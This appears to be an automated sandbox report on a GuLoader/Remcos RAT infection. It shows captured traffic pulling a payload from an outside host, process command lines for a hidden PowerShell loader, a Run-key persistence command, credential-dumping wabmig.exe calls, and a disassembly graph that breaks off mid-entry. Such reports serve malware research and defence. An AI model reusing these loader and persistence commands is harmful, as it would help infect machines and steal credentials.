                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.1049981185.26.107.574433200C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-07 22:40:24 UTC216OUTGET /CubBVEODo227.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: cmgtrading.eu
                                                                          Connection: Keep-Alive
                                                                          Cookie: SERVID=A
                                                                          2024-10-07 22:40:24 UTC318INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Mon, 07 Oct 2024 22:40:24 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 494656
                                                                          Last-Modified: Tue, 24 Sep 2024 01:09:35 GMT
                                                                          Connection: close
                                                                          ETag: "66f2114f-78c40"
                                                                          Expires: Wed, 06 Nov 2024 22:40:24 GMT
                                                                          Cache-Control: max-age=2592000
                                                                          Accept-Ranges: bytes
                                                                          2024-10-07 22:40:24 UTC16066INData Raw: fe 5f 54 5f 80 94 20 d8 39 17 8c 7f f5 9f 5b a0 0f a6 1e 68 f4 96 b4 60 13 54 a4 7c e0 d1 13 48 5f 61 0b bc 64 46 4c b2 bd d0 24 f1 e3 71 1b 82 35 16 12 c9 9e 1f b1 bc dc 36 f6 79 eb ff 1b 0b 3a dc e3 2e f3 d0 0e a5 eb 27 06 cb 85 03 2a 8c cf d7 95 59 e6 fa 54 6e 2a 03 35 20 85 6b 11 73 86 c0 26 5e fc 4a 1a 5e b0 ad a8 b6 71 09 1a 1d 49 5f fb 1d 62 b8 e3 93 4d 3c 02 ca ec 67 67 6f b5 bf d6 dc f1 10 23 91 1b 01 09 ee 3c 6b 81 8d 9f 56 bf 8e 45 2e 80 24 6f 08 fe af 05 c4 c0 c3 fa 70 d6 3d 9f 3c 4c dd 6d a2 ea e5 65 6b 69 a6 d8 b6 e1 66 b6 6a e6 15 b7 c0 7f 52 75 e2 6d 53 ff 38 fa 98 6d 5a 28 86 b8 d3 01 77 69 cf 9b 65 aa cb 0b 1d b2 9b 81 3a 09 a2 fe 22 48 76 41 aa 33 b5 e3 7b a7 f4 38 b4 97 3b 81 5a a1 1f aa e5 8b 39 48 25 2f ed 8f 05 9b 84 d6 1f c8 eb 54
                                                                          Data Ascii: _T_ 9[h`T|H_adFL$q56y:.'*YTn*5 ks&^J^qI_bM<ggo#<kVE.$op=<LmekifjRumS8mZ(wie:"HvA3{8;Z9H%/T
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: 3c 6e 9f 53 7d f5 da 29 bd 77 a2 21 e7 af 93 7b c2 8d 33 f3 e3 ea f7 f4 b4 50 11 42 bf 6d 49 8e 36 34 6e ea 0a f4 29 c7 03 cd e6 a6 eb ec 5a fa 1a 70 e8 b0 fb 3a 74 cc 6f 6f 25 c7 99 1b fe 4b e8 83 a9 60 48 64 76 32 f9 bd 89 97 b5 dd 93 62 5e 6b dc 80 c4 4c 6a d3 45 50 52 00 98 82 e9 86 5c a1 df fb 0d b0 b6 1d 8f b7 64 1f e2 12 50 19 6c bf f9 52 ab 08 a7 cb f9 75 b2 20 67 9c 53 ac 65 5e 9c b2 89 4c e4 64 04 e3 5a 6c 2b 10 a7 78 7c 19 58 ff 16 cb 9b 93 88 74 a0 b9 df 12 0a 90 e0 1c 3b 42 7d 05 7d 40 31 05 69 60 e3 bf 71 24 bc 89 f2 9e d9 94 5d ff 20 35 0c 89 be b0 2b fc 4f eb d1 06 e4 67 2c dc 59 5a 43 c5 13 7c 75 e4 bf d9 2f 90 17 cc 76 bc a7 18 d2 7b a2 03 12 95 8c cd 39 a6 0c 28 a3 35 d0 df 69 3a 91 6b 30 e1 39 17 88 76 b7 4a aa c0 a0 4c 09 c5 ed df 7c
                                                                          Data Ascii: <nS})w!{3PBmI64n)Zp:too%K`Hdv2b^kLjEPR\dPlRu gSe^LdZl+x|Xt;B}}@1i`q$] 5+Og,YZC|u/v{9(5i:k09vJL|
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: bb 12 3b a5 21 3e 05 76 1b 8b 79 fe 63 44 38 4d 30 10 d8 8b 86 72 14 46 18 88 28 18 14 c6 12 30 fa 95 fc b8 6d bd 83 3a e6 79 3f 14 9e 77 07 ee 3a 39 a0 a8 b6 71 09 45 43 12 d4 1e 40 a1 ed 68 7f cc d0 9a ca f4 66 e7 52 a3 8b 2b d2 f1 f7 7c d7 cb cd 0f 90 2a a3 77 e5 f6 25 12 73 5f be 18 a9 e6 d2 de cc 64 29 42 b4 03 15 8c d3 73 1e d1 b3 db 34 7b 46 cd 3c b7 c3 95 52 49 53 70 f4 ee 1f 93 43 93 4a f8 a7 65 d8 3f 13 aa 30 20 40 fe ae 7d 44 bf f6 de 2a a5 8c 56 4d 2c ee bc 89 dd 9c 78 69 33 b4 83 5e 96 d4 4c df df 8e 3d be 6a 11 a2 4f 69 00 8e 43 7c 73 e3 44 a6 a4 e6 1b 4d f0 b2 a8 b7 3f dc f1 69 38 0f 46 4a 37 82 d6 48 0f 20 88 c7 42 ed ab 4b 3d 62 88 c2 4e 64 0e df e7 41 c0 f7 db 6c 65 25 1b 75 ad 4c 4f a5 e6 87 c2 7b 32 9b ac 38 de 83 e8 b5 a6 4e 9c 85 b4
                                                                          Data Ascii: ;!>vycD8M0rF(0m:y?w:9qEC@hfR+|*w%s_d)Bs4{F<RISpCJe?0 @}D*VM,xi3^L=jOiC|sDM?i8FJ7H BK=bNdAle%uLO{28N
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: 6a ed ec 93 97 a1 b2 30 9b 32 35 96 23 40 50 8f b9 ec e2 61 51 69 05 6c ff d1 1b 56 dd 4b bf 1b 35 20 a9 36 1c da 6e 69 1d 86 54 51 b1 ae 2a c8 86 c7 fe 12 f1 2f ca f4 ac 11 49 25 83 79 29 b5 56 f0 e3 1d 1f ab e2 ac 22 f6 ef bf a4 4d 94 4f 9a 85 72 85 7d af 39 ac cf df 80 8b 72 bd 81 87 d3 0c 64 d9 3e fa 4c a5 08 33 46 f2 ec 92 63 1a 2a 45 0a 8c 3f b8 7c be e5 55 44 2e 71 96 84 3f 9d 38 bb cf ab 73 50 93 bb 97 02 74 94 41 d1 5b 9d 13 1d 85 17 97 86 f3 fc 07 d7 6d d9 76 6e 60 1e 87 e1 e0 32 c7 ee 8a e8 2c 9f ca 12 42 e4 fa b5 89 50 29 80 58 a6 75 d7 06 11 3a d6 ff 0e 46 c5 c9 2b cd 58 be 67 fe a7 e5 b3 ec 37 ba 27 7a d6 30 c6 a1 9e 6a f6 14 79 d9 3f 16 2d 12 cd 1b 6e c9 1e 06 46 98 77 58 d0 b9 8f 1b 91 da c2 74 a1 19 cf 71 f7 86 6d 0d 37 e4 e9 b2 be 60 82
                                                                          Data Ascii: j025#@PaQilVK5 6niTQ*/I%y)V"MOr}9rd>L3Fc*E?|UD.q?8sPtA[mvn`2,BP)Xu:F+Xg7'z0jy?-nFwXtqm7`
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: a4 c5 80 e0 02 e2 45 1c fd 2d 43 b7 a4 e9 7e b7 2e a3 f4 d4 7c 35 cf bc cb 74 fa be e6 6e aa ce 22 2f 84 77 2a fb e0 83 52 ea 93 d0 44 ec 59 5e 34 7f 8d 26 bc 89 29 5c 8b b8 ac b7 a4 09 64 0e 4f 39 4f 80 7d 2e 01 e2 dc 80 52 bc 55 14 bd eb ef 0a 28 2b bc a3 a4 d7 09 76 58 f8 7f 70 94 77 5e 96 45 88 8e 7c 64 b5 21 c8 5b 68 c5 f0 94 0b 65 89 6e 10 fc f1 c3 7b 26 1d 35 6f 9b f9 c7 e0 28 b1 52 43 e1 6b 9f 3c 7e 7f 03 c1 69 80 de b2 37 31 5e d9 44 a3 61 c5 b5 98 da 94 48 56 33 a9 4b a0 7f 1f a5 37 f0 ab 57 20 e1 90 78 10 28 df 4b cf 22 52 42 22 4e 74 b3 3b 94 62 ab c5 8b d7 ea 46 cf 1a 67 82 f4 f5 0e 4b e4 a3 7a 95 1c c6 c6 b7 f5 d1 a8 7b c0 cf 78 29 74 b2 a8 89 d3 1d 4a 86 f6 76 8d 34 ca 10 4d 43 92 ce f8 24 4f 04 d2 ec b8 19 53 24 aa d9 1f 94 63 8e d4 7d 9f
                                                                          Data Ascii: E-C~.|5tn"/w*RDY^4&)\dO9O}.RU(+vXpw^E|d![hen{&5o(RCk<~i71^DaHV3K7W x(K"RB"Nt;bFgKz{x)tJv4MC$OS$c}
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: d7 47 b6 bf 09 cc 3b 04 48 39 5f 53 98 0a de 1a 0f c1 51 89 32 d6 9e 2b 9f 71 f9 e9 b2 69 de 8b b6 ee 20 6b c4 3c da 21 b2 73 31 71 2f 7c b8 ec 1c f6 3d 44 73 48 98 d7 68 94 22 52 e3 f6 86 fa 40 6f e9 96 d8 b5 94 c0 68 88 47 70 77 bd 58 1a 1e ee 51 ee a8 f0 61 ce 7b af b1 72 ab 42 e4 cc 0d 91 cc d3 38 10 0e 80 a5 68 cd 4c 6b db 11 e0 c3 eb 18 11 e1 25 d6 be 27 3c 07 2b b3 ac 99 0f 2c 8f 41 41 e7 79 01 54 9f 82 7e 8f eb 7f ad b0 9c a1 ac 3e 28 4e 0e 77 98 67 60 af 89 55 fa f7 33 3e 96 d0 72 eb 19 92 2e b6 2c cb 8e 27 18 73 61 56 c9 2e d9 fc db 35 f6 dc 56 57 c0 11 52 a6 ee 09 3a 0e cf 47 b9 d0 be e1 be 58 7a 94 45 e5 10 44 79 8a 6a 3d 37 93 88 1e 1a 08 6c 66 e4 34 5d a8 f1 fa 37 22 a4 e0 a3 8d 11 94 5f 54 08 9d 42 16 14 d5 53 89 43 d1 9a a6 71 fa b6 bf 75
                                                                          Data Ascii: G;H9_SQ2+qi k<!s1q/|=DsHh"R@ohGpwXQa{rB8hLk%'<+,AAyT~>(Nwg`U3>r.,'saV.5VWR:GXzEDyj=7lf4]7"_TBSCqu
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: 49 3e b1 cd 4f d3 6a 74 9b ad ad 0e 11 6a ef 1b 4c 6d 07 e5 a4 6d ad 71 92 88 f1 e1 4d 77 41 6b 90 40 85 7e 89 10 1c 3c f9 75 9e 9e 11 63 a5 bb 35 15 28 5a c7 31 9e 85 8a ae 45 40 31 08 1c 8b ae 0a 33 6c a5 1b 96 31 b5 5c ff 39 46 aa 59 1d ad 77 57 35 38 fa 82 10 ef 1d df 87 2c 6b 05 29 67 9f 0c de 02 91 72 e0 ab dd 0b e0 ab 74 f8 bc 7e 50 9d e5 6a 67 69 db de c7 09 d3 9e 60 1e d4 14 4c f4 4b 14 a9 be a7 b0 ab 8b d0 79 d8 e4 99 cf 5b d1 2c 66 2e a3 6c 68 ef bd b9 c2 2f f5 a9 7e 9b 3e 89 2b fe 1c b5 05 64 e1 80 36 7c 21 64 b3 5f 1b 93 a8 5d 42 f5 48 2a aa b4 e6 35 9b 4e f6 10 e4 f3 0f b9 f3 de 2f 73 e1 b3 89 05 9c 67 4b 60 31 60 18 62 3a 16 87 15 28 99 fd ed 66 9e 89 4f 72 25 bc 84 78 45 b0 e7 48 f4 9d 90 8f 9c a9 e3 36 05 6f 1a 2e be b7 d6 da 4d 07 0f dc
                                                                          Data Ascii: I>OjtjLmmqMwAk@~<uc5(Z1E@13l1\9FYwW58,k)grt~Pjgi`LKy[,f.lh/~>+d6|!d_]BH*5N/sgK`1`b:(fOr%xEH6o.M
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: b5 3b b6 8c 25 f1 4a d5 66 1f 24 eb 8a b4 a8 e6 22 32 e6 37 cd 6b 2f 6a ac 8e 50 de 59 3c a2 21 38 81 a3 a8 a4 67 24 d2 63 e0 27 7a bd 40 ac ad 1f fb 08 b4 14 75 69 bb bb 18 2f bd 4a a6 84 de 92 f1 4a 3b 11 aa 19 25 33 37 0b 2c 88 94 eb 56 c7 19 3c 50 90 cf 6c 51 92 cf db 75 50 0f 11 50 12 1d 1f d3 4c 20 ce 3a 9b d6 55 b1 e3 09 08 a6 f8 ba e0 69 61 19 1d 9a a7 79 1a 00 10 c4 3e 0b 82 b5 76 c7 42 e1 ab 4b 3d 72 1d c2 4e 67 ea 20 19 3d c4 f8 7a a1 0d b2 be 03 20 ea 1a 27 83 90 d1 9c 04 3a a5 81 21 f7 cc c8 4e 2c c9 f6 06 bd 39 10 27 9e c2 29 cc 00 f6 5e 0d a2 5c ce 34 72 c8 96 96 06 da ce 3a 32 11 57 79 2c 02 e9 da 3d 4c 27 e6 0f db 1d 0c 44 f4 19 bb be 2f b5 9f f4 dd e2 a1 32 7e 5a c7 ea 7a 1a 59 d3 4f d1 c1 d5 61 29 40 19 19 3b fa 4c 1e 1c 89 ec 84 20 75
                                                                          Data Ascii: ;%Jf$"27k/jPY<!8g$c'z@ui/JJ;%37,V<PlQuPPL :Uiay>vBK=rNg =z ':!N,9')^\4r:2Wy,=L'D/2~ZzYOa)@;L u
                                                                          2024-10-07 22:40:24 UTC16384INData Raw: 8d 93 94 c0 95 75 87 6c b4 7f 96 ce 9e 42 db 74 6d 4f ab 78 c1 05 4a e9 48 1e 1a 0d 46 49 8b da 77 dd 60 17 a2 43 06 92 3e 4a ac 4a 39 96 0f 70 e0 61 28 c2 28 10 80 0c b5 cb 7e 4f 11 d4 7a 6b 1f 80 72 67 84 5f 95 0e d1 81 53 a3 94 0f 59 a9 98 88 b1 08 a4 f7 b0 d1 3a 4c 02 7d 58 cf 98 0f bd 76 25 ab 64 df 70 09 9c 6c 11 50 86 ff f0 de c6 c9 64 5f bc 04 91 8a a3 a8 05 6e e0 ee 32 e6 3e ad 7e 57 b4 2d 8d 6c 45 69 4e e5 eb 4c c2 58 3c 51 86 22 42 97 35 89 0b c9 0a 5a f0 1e c2 9c 07 42 b3 2d b8 56 85 cd 62 28 d6 66 ea 57 c1 09 85 89 cf cc 85 96 bc 26 94 45 b5 ef 5d 8d 6d 3a 9b bd f4 11 f1 91 52 5d 9f b8 a0 e0 9d 52 88 f1 55 34 56 9a 6d 5a b3 9d ce 40 28 96 43 e6 3e 04 69 41 1a 8f 2c 55 d8 de bd 9e 08 ea 92 84 a6 5a 45 28 5c 26 1b 12 3a 5c 1e c7 da 39 98 68 97
                                                                          Data Ascii: ulBtmOxJHFIw`C>JJ9pa((~Ozkrg_SY:L}Xv%dplPd_n2>~W-lEiNLX<Q"B5ZB-Vb(fW&E]m:R]RU4VmZ@(C>iA,UZE(\&:\9h
                                                                          2024-10-07 22:40:25 UTC16384INData Raw: 95 94 e4 e5 01 ed aa 37 05 eb 1e 18 bd c5 6a 03 81 75 0a d5 83 c1 73 d5 8f 66 3e 23 6a b0 60 03 41 f8 a2 7b 37 4a 92 7f 8f e3 cf 0a 81 b4 4f 60 8b 77 5e c6 a9 5e ae 90 3e 2d 8b 84 4f c0 c8 25 44 43 e4 ab 8b 49 3d 7b 91 68 52 95 95 ef 48 24 85 fe cf 8b d6 06 e7 66 fd 20 6a 39 25 63 3a 3e 6c 5a cb 54 d3 cd a4 f4 8c 9a e0 de 09 73 a3 c7 37 1a 6f a3 7c ce f1 1d a3 b4 71 5c 72 9f cb 9f c4 01 e5 2e 34 89 2a b3 45 a6 39 1d 00 9b 3b c3 3e 95 58 ac 8f 9b 2f ca 42 b4 c3 ce 8a 1f 42 67 4b 98 07 e2 17 e4 bc 37 a9 84 34 80 00 82 eb 37 2d f2 12 7f d0 08 76 c3 fd 5f 42 11 e9 4f 35 77 9e 0d 84 a6 7c f7 09 32 9c a9 a5 1e ca d6 8a cd e6 d8 28 fb 49 24 e6 53 3b ee 13 60 2b 55 73 f9 98 19 ce fe 11 c0 8d b0 0c 23 ae 3e 26 a8 da 7d 9e 81 6b 49 db 36 8c c9 0a a1 68 97 be 70 cb
                                                                          Data Ascii: 7jusf>#j`A{7JO`w^^>-O%DCI={hRH$f j9%c:>lZTs7o|q\r.4*E9;>X/BBgK747-v_BO5w|2(I$S;`+Us#>&}kI6hp


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:5
                                                                          Start time:18:38:32
                                                                          Start date:07/10/2024
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
                                                                          Imagebase:0x400000
                                                                          File size:648'112 bytes
                                                                          MD5 hash:84E09BF944042FBD418724CDDB729516
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:18:38:33
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
                                                                          Imagebase:0xd90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2408058471.000000000C4AF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:18:38:33
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff620390000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:18:40:03
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                                                          Imagebase:0x610000
                                                                          File size:66'048 bytes
                                                                          MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:13
                                                                          Start time:18:40:20
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
                                                                          Imagebase:0xd70000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:18:40:20
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff620390000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:18:40:20
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
                                                                          Imagebase:0x900000
                                                                          File size:59'392 bytes
                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:18:40:27
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
                                                                          Imagebase:0x610000
                                                                          File size:66'048 bytes
                                                                          MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:18:40:27
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
                                                                          Imagebase:0x610000
                                                                          File size:66'048 bytes
                                                                          MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:18:40:27
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
                                                                          Imagebase:0x610000
                                                                          File size:66'048 bytes
                                                                          MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:24.8%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:21.4%
                                                                            Total number of Nodes:1326
                                                                            Total number of Limit Nodes:47
                                                                            execution_graph 3212 4015c1 3213 402c37 17 API calls 3212->3213 3214 4015c8 3213->3214 3232 405bc8 CharNextW CharNextW 3214->3232 3216 401631 3218 401663 3216->3218 3219 401636 3216->3219 3217 405b4a CharNextW 3225 4015d1 3217->3225 3221 401423 24 API calls 3218->3221 3238 401423 3219->3238 3229 40165b 3221->3229 3225->3216 3225->3217 3228 401617 GetFileAttributesW 3225->3228 3230 4015fa 3225->3230 3242 405819 3225->3242 3250 4057fc CreateDirectoryW 3225->3250 3227 40164a SetCurrentDirectoryW 3227->3229 3228->3225 3230->3225 3245 40577f CreateDirectoryW 3230->3245 3233 405be5 3232->3233 3236 405bf7 3232->3236 3234 405bf2 CharNextW 3233->3234 3233->3236 3237 405c1b 3234->3237 3235 405b4a CharNextW 3235->3236 3236->3235 3236->3237 3237->3225 3239 4052b0 24 API calls 3238->3239 3240 401431 3239->3240 3241 40624c lstrcpynW 3240->3241 3241->3227 3253 406626 GetModuleHandleA 3242->3253 3246 4057d0 GetLastError 3245->3246 3247 4057cc 3245->3247 3246->3247 3248 4057df SetFileSecurityW 3246->3248 3247->3230 3248->3247 3249 4057f5 GetLastError 3248->3249 3249->3247 3251 405810 GetLastError 3250->3251 3252 40580c 3250->3252 3251->3252 3252->3225 3254 406642 3253->3254 3255 40664c GetProcAddress 3253->3255 3259 4065b6 GetSystemDirectoryW 3254->3259 3256 405820 3255->3256 3256->3225 3258 406648 3258->3255 3258->3256 3260 4065d8 wsprintfW LoadLibraryExW 3259->3260 3260->3258 3262 401941 3263 401943 3262->3263 3264 402c37 17 API calls 3263->3264 3265 401948 3264->3265 3268 40595a 3265->3268 3307 405c25 3268->3307 3271 405982 DeleteFileW 3276 401951 3271->3276 3272 405999 3274 405ab9 3272->3274 3321 40624c lstrcpynW 3272->3321 3274->3276 3339 40658f FindFirstFileW 3274->3339 3275 4059bf 3277 4059d2 3275->3277 3278 4059c5 lstrcatW 3275->3278 3322 405b69 lstrlenW 3277->3322 3279 4059d8 3278->3279 3282 4059e8 lstrcatW 3279->3282 3284 4059f3 lstrlenW FindFirstFileW 3279->3284 3282->3284 3284->3274 3292 405a15 3284->3292 3285 405ae2 3342 405b1d lstrlenW CharPrevW 3285->3342 3288 405a9c FindNextFileW 3288->3292 3293 405ab2 FindClose 3288->3293 3289 405912 5 API calls 3291 405af4 3289->3291 3294 405af8 3291->3294 3295 405b0e 3291->3295 3292->3288 3302 405a5d 3292->3302 3326 40624c lstrcpynW 3292->3326 3293->3274 3294->3276 3298 4052b0 24 API calls 3294->3298 3297 4052b0 24 API calls 3295->3297 3297->3276 3300 405b05 3298->3300 3299 40595a 60 API calls 3299->3302 3301 406012 36 API calls 3300->3301 3304 405b0c 3301->3304 3302->3288 3302->3299 3303 4052b0 24 API calls 3302->3303 3305 4052b0 24 API calls 3302->3305 3327 405912 3302->3327 3335 406012 MoveFileExW 3302->3335 3303->3288 3304->3276 3305->3302 3345 40624c 